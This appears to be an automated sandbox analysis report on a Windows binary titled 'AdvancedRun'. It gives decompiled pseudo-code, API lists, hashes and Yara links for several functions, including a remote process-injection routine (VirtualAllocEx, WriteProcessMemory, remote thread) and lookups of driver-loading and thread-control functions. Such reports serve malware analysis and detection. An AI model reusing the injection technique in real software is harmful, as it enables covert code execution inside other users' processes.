                                                                                                                            Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                            0x004095da
                                                                                                                            0x004095da
                                                                                                                            0x004095de
                                                                                                                            0x004095e1
                                                                                                                            0x004095e7
                                                                                                                            0x004095e7
                                                                                                                            0x004095ee
                                                                                                                            0x004095fc

                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3664257935-0
                                                                                                                            • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                            • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                            • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                            • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                            0x0040a3d0
                                                                                                                            0x0040a3d9

                                                                                                                            APIs
                                                                                                                            • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumNamesResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3334572018-0
                                                                                                                            • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                            • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                            • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                            • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                            0x00408e38
                                                                                                                            0x00408e44
                                                                                                                            0x00408e56
                                                                                                                            0x00408e68
                                                                                                                            0x00408e7a
                                                                                                                            0x00408e8c
                                                                                                                            0x00408e9e
                                                                                                                            0x00408eb0
                                                                                                                            0x00408ec2
                                                                                                                            0x00408ed4
                                                                                                                            0x00408ee6
                                                                                                                            0x00408ef8
                                                                                                                            0x00408f0a
                                                                                                                            0x00408f1c
                                                                                                                            0x00408f21
                                                                                                                            0x00408f23
                                                                                                                            0x00000000
                                                                                                                            0x00408f28
                                                                                                                            0x00408f29

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                            • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                            • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                            • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                            • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                            • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                            • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                            • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                            • API String ID: 667068680-4280973841
                                                                                                                            • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                            • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                            • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                            • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                            0x0040a474
                                                                                                                            0x0040a47b
                                                                                                                            0x0040a48a
                                                                                                                            0x0040a48d
                                                                                                                            0x0040a48f
                                                                                                                            0x0040a497
                                                                                                                            0x0040a49a
                                                                                                                            0x0040a6f7
                                                                                                                            0x0040a6f9
                                                                                                                            0x0040a700
                                                                                                                            0x0040a700
                                                                                                                            0x0040a4ad
                                                                                                                            0x0040a4b3
                                                                                                                            0x0040a4b8
                                                                                                                            0x0040a4c6
                                                                                                                            0x0040a4cc
                                                                                                                            0x0040a4cf
                                                                                                                            0x0040a4dd
                                                                                                                            0x0040a4e2
                                                                                                                            0x0040a4e3
                                                                                                                            0x0040a4ea
                                                                                                                            0x0040a4e5
                                                                                                                            0x0040a4e5
                                                                                                                            0x0040a4e5
                                                                                                                            0x0040a4ec
                                                                                                                            0x0040a4f6
                                                                                                                            0x0040a4fe
                                                                                                                            0x0040a503
                                                                                                                            0x0040a504
                                                                                                                            0x0040a50b
                                                                                                                            0x0040a506
                                                                                                                            0x0040a506
                                                                                                                            0x0040a506
                                                                                                                            0x0040a50d
                                                                                                                            0x0040a512
                                                                                                                            0x0040a518
                                                                                                                            0x0040a51c
                                                                                                                            0x0040a523
                                                                                                                            0x0040a523
                                                                                                                            0x0040a523
                                                                                                                            0x0040a528
                                                                                                                            0x0040a537
                                                                                                                            0x0040a54c
                                                                                                                            0x0040a539
                                                                                                                            0x0040a544
                                                                                                                            0x0040a549
                                                                                                                            0x0040a558
                                                                                                                            0x0040a56d
                                                                                                                            0x0040a55a
                                                                                                                            0x0040a565
                                                                                                                            0x0040a56a
                                                                                                                            0x0040a579
                                                                                                                            0x0040a591
                                                                                                                            0x0040a57b
                                                                                                                            0x0040a589
                                                                                                                            0x0040a58e
                                                                                                                            0x0040a5b4
                                                                                                                            0x0040a5b7
                                                                                                                            0x0040a5cc
                                                                                                                            0x0040a5cf
                                                                                                                            0x0040a5d4
                                                                                                                            0x0040a5d7
                                                                                                                            0x0040a6ed
                                                                                                                            0x0040a5e5
                                                                                                                            0x0040a5fa
                                                                                                                            0x0040a60b
                                                                                                                            0x0040a61a
                                                                                                                            0x0040a620
                                                                                                                            0x0040a623
                                                                                                                            0x0040a62b
                                                                                                                            0x0040a62f
                                                                                                                            0x0040a632
                                                                                                                            0x0040a659
                                                                                                                            0x0040a634
                                                                                                                            0x0040a635
                                                                                                                            0x0040a641
                                                                                                                            0x0040a648
                                                                                                                            0x0040a648
                                                                                                                            0x0040a668
                                                                                                                            0x0040a66e
                                                                                                                            0x0040a685
                                                                                                                            0x0040a69e
                                                                                                                            0x0040a6a8
                                                                                                                            0x0040a6ad
                                                                                                                            0x0040a6bd
                                                                                                                            0x0040a6c5
                                                                                                                            0x0040a6c8
                                                                                                                            0x0040a6d0
                                                                                                                            0x0040a6d1
                                                                                                                            0x0040a6d2
                                                                                                                            0x0040a6d3
                                                                                                                            0x0040a6d3
                                                                                                                            0x0040a6c8
                                                                                                                            0x0040a6d7
                                                                                                                            0x0040a6dc
                                                                                                                            0x0040a6dc
                                                                                                                            0x0040a6d7
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                                                                            • memset.MSVCRT ref: 0040A4B3
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                                                                              • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                              • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                              • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                              • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                              • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                                                                              • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                                                                            • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                                                                            • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                            • memset.MSVCRT ref: 0040A66E
                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                            • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                            • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                            • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                            • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                            • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                            • API String ID: 1572607441-20550370
                                                                                                                            • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                            • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                            • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                            • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                            0x00401093
                                                                                                                            0x00401096
                                                                                                                            0x00401097
                                                                                                                            0x0040109b
                                                                                                                            0x004010a3
                                                                                                                            0x004010a5
                                                                                                                            0x00401270
                                                                                                                            0x00401278
                                                                                                                            0x004012b3
                                                                                                                            0x0040127a
                                                                                                                            0x00401293
                                                                                                                            0x004012a2
                                                                                                                            0x004012a2
                                                                                                                            0x004012c1
                                                                                                                            0x004012d9
                                                                                                                            0x004012ea
                                                                                                                            0x004012ec
                                                                                                                            0x004012f6
                                                                                                                            0x00000000
                                                                                                                            0x004010ab
                                                                                                                            0x004010ab
                                                                                                                            0x004010ac
                                                                                                                            0x00401231
                                                                                                                            0x00401236
                                                                                                                            0x00401239
                                                                                                                            0x0040123d
                                                                                                                            0x00401249
                                                                                                                            0x00401249
                                                                                                                            0x0040124c
                                                                                                                            0x00000000
                                                                                                                            0x00401252
                                                                                                                            0x00401259
                                                                                                                            0x00401265
                                                                                                                            0x00000000
                                                                                                                            0x00401265
                                                                                                                            0x0040123f
                                                                                                                            0x0040123f
                                                                                                                            0x00401243
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00401243
                                                                                                                            0x004010b2
                                                                                                                            0x004010b2
                                                                                                                            0x004010b5
                                                                                                                            0x004011e1
                                                                                                                            0x004011e3
                                                                                                                            0x004011e6
                                                                                                                            0x0040120e
                                                                                                                            0x00401216
                                                                                                                            0x00000000
                                                                                                                            0x0040121c
                                                                                                                            0x00401224
                                                                                                                            0x00401226
                                                                                                                            0x00401229
                                                                                                                            0x00000000
                                                                                                                            0x0040122f
                                                                                                                            0x00000000
                                                                                                                            0x0040122f
                                                                                                                            0x00401229
                                                                                                                            0x004011e8
                                                                                                                            0x004011e8
                                                                                                                            0x004011ed
                                                                                                                            0x004011fb
                                                                                                                            0x00401203
                                                                                                                            0x00401203
                                                                                                                            0x004010bb
                                                                                                                            0x004010bb
                                                                                                                            0x004010c0
                                                                                                                            0x00401151
                                                                                                                            0x0040115a
                                                                                                                            0x00401168
                                                                                                                            0x0040116b
                                                                                                                            0x0040116e
                                                                                                                            0x00401170
                                                                                                                            0x00401173
                                                                                                                            0x00401180
                                                                                                                            0x00401182
                                                                                                                            0x00401185
                                                                                                                            0x004011a4
                                                                                                                            0x004011ac
                                                                                                                            0x00000000
                                                                                                                            0x004011b2
                                                                                                                            0x004011ba
                                                                                                                            0x004011bc
                                                                                                                            0x004011c7
                                                                                                                            0x004011c9
                                                                                                                            0x004011cb
                                                                                                                            0x00000000
                                                                                                                            0x004011d1
                                                                                                                            0x00000000
                                                                                                                            0x004011d1
                                                                                                                            0x004011cb
                                                                                                                            0x00401187
                                                                                                                            0x00401187
                                                                                                                            0x00401199
                                                                                                                            0x00000000
                                                                                                                            0x00401199
                                                                                                                            0x004010c6
                                                                                                                            0x004010c8
                                                                                                                            0x004012fd
                                                                                                                            0x004012fd
                                                                                                                            0x004012fd
                                                                                                                            0x004010ce
                                                                                                                            0x004010ce
                                                                                                                            0x004010d7
                                                                                                                            0x004010e5
                                                                                                                            0x004010e8
                                                                                                                            0x004010eb
                                                                                                                            0x004010ed
                                                                                                                            0x004010f0
                                                                                                                            0x00401102
                                                                                                                            0x0040111d
                                                                                                                            0x00401125
                                                                                                                            0x00000000
                                                                                                                            0x0040112b
                                                                                                                            0x00401133
                                                                                                                            0x00401135
                                                                                                                            0x00401140
                                                                                                                            0x00401142
                                                                                                                            0x00401144
                                                                                                                            0x00000000
                                                                                                                            0x0040114a
                                                                                                                            0x0040114a
                                                                                                                            0x00000000
                                                                                                                            0x0040114a
                                                                                                                            0x00401144
                                                                                                                            0x00401104
                                                                                                                            0x0040110a
                                                                                                                            0x0040110b
                                                                                                                            0x0040110b
                                                                                                                            0x0040110e
                                                                                                                            0x00401115
                                                                                                                            0x00401117
                                                                                                                            0x00401117
                                                                                                                            0x00401102
                                                                                                                            0x004010c8
                                                                                                                            0x004010c0
                                                                                                                            0x004010b5
                                                                                                                            0x004010ac
                                                                                                                            0x00401303

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                            • String ID: AdvancedRun
                                                                                                                            • API String ID: 829165378-481304740
                                                                                                                            • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                            • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                            • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                            • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                            Download Yara Rule
